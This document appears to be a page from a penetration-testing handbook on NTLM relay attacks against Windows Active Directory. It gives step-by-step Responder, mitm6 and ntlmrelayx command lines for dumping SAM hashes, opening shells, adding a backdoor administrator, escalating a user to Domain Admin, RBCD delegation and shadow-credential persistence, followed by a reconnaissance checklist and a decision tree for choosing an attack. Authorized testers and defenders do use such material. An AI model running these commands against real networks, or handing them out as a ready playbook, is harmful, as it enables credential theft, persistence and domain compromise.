Handbook

Relays

Updated 29 Sept 2026Services✎ Suggest a change
On this page

Relay Types at a Glance

MethodToolsTargetBest For
LLMNR Poison → SMB RelayResponder + ntlmrelayxSMB (445)SAM dumps, shells, lateral movement on workstations
LLMNR Poison → LDAP RelayResponder + ntlmrelayxLDAP/LDAPS (389/636)AD enumeration when mitm6 isn't viable
IPv6 DHCPv6 → LDAP Relaymitm6 + ntlmrelayxLDAPS (636)AD object modification, domain compromise
IPv6 + IPv4 CombinedResponder + mitm6 + ntlmrelayxSMB + LDAPSMaximum coverage, noisy - use carefully

Method 1 - LLMNR Poison → SMB Relay

Best for: Lateral movement, SAM dumps, shells on workstations where SMB signing is disabled

bash
# Terminal 1 — poison only, SMB/HTTP off so ntlmrelayx handles auth
sudo responder -I <interface> -dw

# Terminal 2 — SAM dump (default)
impacket-ntlmrelayx -tf targets.txt -smb2support

# Terminal 2 — interactive shell
impacket-ntlmrelayx -tf targets.txt -smb2support -i
nc 127.0.0.1 11000

# Terminal 2 — execute command
impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami"

# Terminal 2 — create backdoor admin
impacket-ntlmrelayx -tf targets.txt -smb2support -c "net user <username> <password> /add && net localgroup administrators <username> /add"
Requires: SMB signing disabled on target, relayed user has local admin rights

Method 2 - LLMNR Poison → LDAP Relay

Best for: AD enumeration and object modification without mitm6 — useful when IPv6 is locked down

bash
# Terminal 1 — poison only
sudo responder -I <interface> -dw

# Terminal 2 — relay to LDAP, dump AD
impacket-ntlmrelayx -tf targets.txt -smb2support -t ldaps://<dc-ip> -l lootme

# Terminal 2 — escalate user to Domain Admin
impacket-ntlmrelayx -t ldaps://<dc-ip> --escalate-user <username>

# Terminal 2 — RBCD delegation
impacket-ntlmrelayx -t ldaps://<dc-ip> --add-computer <computer-name> --delegate-access
Requires: LDAP signing not enforced on DC, relayed user has sufficient LDAP write rights

Method 3 - IPv6 DHCPv6 → LDAP Relay (mitm6)

Best for: Domain compromise via AD object modification - most powerful relay chain, no SMB signing dependency

bash
# Terminal 1 — spoof DHCPv6, become victim's DNS server
sudo mitm6 -d <domain.local>

# Terminal 2 — AD domain dump
impacket-ntlmrelayx -6 -t ldaps://<dc-ip> -wh fakewpad.<domain.local> -l lootme

# Terminal 2 — create machine account
impacket-ntlmrelayx -6 -t ldaps://<dc-ip> -wh fakewpad.<domain.local> -l lootme -smb2support --add-computer <computer-name>

# Terminal 2 — escalate user to Domain Admin
impacket-ntlmrelayx -6 -t ldaps://<dc-ip> -wh fakewpad.<domain.local> --escalate-user <username>

# Terminal 2 — RBCD delegation
impacket-ntlmrelayx -6 -t ldaps://<dc-ip> -wh fakewpad.<domain.local> --add-computer <computer-name> --delegate-access

# Terminal 2 — shadow credentials (stealthy persistence)
impacket-ntlmrelayx -6 -t ldaps://<dc-ip> -smb2support --shadow-credentials --no-dump --no-validate-privs
Requires: IPv6 active on network, LDAP signing not enforced on DC

Method 4 - IPv6 + IPv4 Combined (Maximum Coverage)

Best for: Engagements where you want to maximise capture opportunity — catches both IPv4 and IPv6 auth simultaneously

bash
# Responder config first — disable conflicting servers
sudo mousepad /etc/responder/Responder.conf
# Set: SMB = Off, HTTP = Off

# Terminal 1 — IPv4 LLMNR/NBT-NS poisoning only
sudo responder -I <interface> -dw

# Terminal 2 — IPv6 DHCPv6 spoofing
sudo mitm6 -d <domain.local>

# Terminal 3 — relay all incoming auth from both
impacket-ntlmrelayx -6 -tf targets.txt -t ldaps://<dc-ip> -wh fakewpad.<domain.local> -l lootme -smb2support
Noisier than running individually - use carefully on sensitive engagements

Pre-Attack Checklist

bash
# Identify SMB signing status — build targets.txt for SMB relay
crackmapexec smb <subnet>/24 --gen-relay-list targets.txt

# Check LDAP signing status on DC
crackmapexec ldap <dc-ip> -u <username> -p <password> -M ldap-checker

# Check machine account quota — confirms --add-computer will work
crackmapexec ldap <dc-ip> -u <username> -p <password> -M MAQ

# Confirm IPv6 is active on the network
sudo tcpdump -i <interface> ip6 -nn

# Check WPAD DNS record — if no result, fake WPAD will be accepted
nslookup wpad.<domain.local> <dc-ip>

Decision Tree

plain text
Are multiple machines active on the network?
└── No → Wait or use a different technique
└── Yes ↓

Is IPv6 active on the network?
├── Yes → Use Method 3 (mitm6 + LDAP relay) — most powerful
└── No ↓

Is SMB signing disabled on any hosts?
├── Yes → Use Method 1 (Responder + SMB relay)
└── No ↓

Is LDAP signing disabled on the DC?
├── Yes → Use Method 2 (Responder + LDAP relay)
└── No → Limited relay options — focus on hash cracking instead